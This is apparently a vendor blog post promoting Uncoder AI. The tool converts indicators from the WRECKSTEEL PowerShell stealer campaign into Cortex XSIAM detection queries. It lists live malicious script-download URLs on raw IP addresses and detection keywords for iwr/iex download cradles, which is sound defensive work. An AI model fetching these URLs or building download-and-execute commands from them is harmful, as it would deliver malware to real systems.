
How It Works
Uncoder AI translates threat intelligence into Cortex XSIAM detection logic by ingesting structured IOCs and extracting relevant execution behaviors. This example focuses on the WRECKSTEEL campaign (CERT-UA#14283), a PowerShell-based stealer that abuses native tools and network requests to exfiltrate data.
On the left, Uncoder AI parses dozens of SHA256 hashes, filenames, scripts (script.ps1, scripttest.ps1), and phishing lure documents. On the right, it auto-generates Cortex XQL (XSIAM Query Language) detection logic that targets real-world execution patterns based on telemetry from winEventLog.
Auto-Generated Cortex XQL Logic
The output query is tailored to Cortex XSIAM’s data model and monitors suspicious command-line executions, including:
- Process Names:
powershell.exe
andwscript.exe
- Command-Line Indicators:
- URLs linked to script downloads:
http://107.189.20.74/screvan.ps1
http://172.86.122.94/scrxxx.ps1
http://172.86.104.17/scratest.ps1
http://144.172.98.178/scretest.ps1
http://172.86.88.15/scripttest.ps1
http://45.61.157.179/script.ps1
- Parameters:
"*iwr*"
(Invoke-WebRequest)"*iex*"
(Invoke-Expression)
- URLs linked to script downloads:
- Script-Based Execution:
- WScript executing
AppFinalDesktop.vbs
from temporary directories
- WScript executing
This detection logic is designed to match malicious script execution chains that leverage PowerShell’s native capabilities and hardcoded payload delivery via HTTP.
Why It’s Innovative
Creating behavioral rules in Cortex XSIAM requires manual curation of execution patterns, field mappings, and IOC context. Uncoder AI automates this by:
- Recognizing execution syntaxes like
iwr
andiex
used in living-off-the-land attacks - Correlating specific IOCs (URLs, file paths, scripts) with known malware campaigns
- Auto-generating XQL logic compatible with Palo Alto’s data schema and
winEventLog
fields
This streamlines detection engineering by eliminating the need for custom rule authoring and enhancing IOC-to-behavior correlation.
Operational Value
Security teams using Cortex XSIAM benefit from:
- Accelerated Rule Creation
Rapid conversion of threat intel into Cortex-compatible queries - Precision IOC-to-Telemetry Mapping
Targeting real attacker behaviors like PowerShell download cradles and script execution - Improved Detection Coverage
Multi-layered matching of process names, script execution flags, and malicious network destinations
By turning passive IOC feeds into active XSIAM detection logic, Uncoder AI empowers defenders to operationalize intelligence at speed and scale.
Uncoder AI translates IOCs into Palo Alto Cortex XSIAM queries — delivering actionable, high-fidelity queries for PowerShell-based threats.
The post AI-Driven IOC Conversion for Palo Alto Cortex XSIAM Queries appeared first on SOC Prime.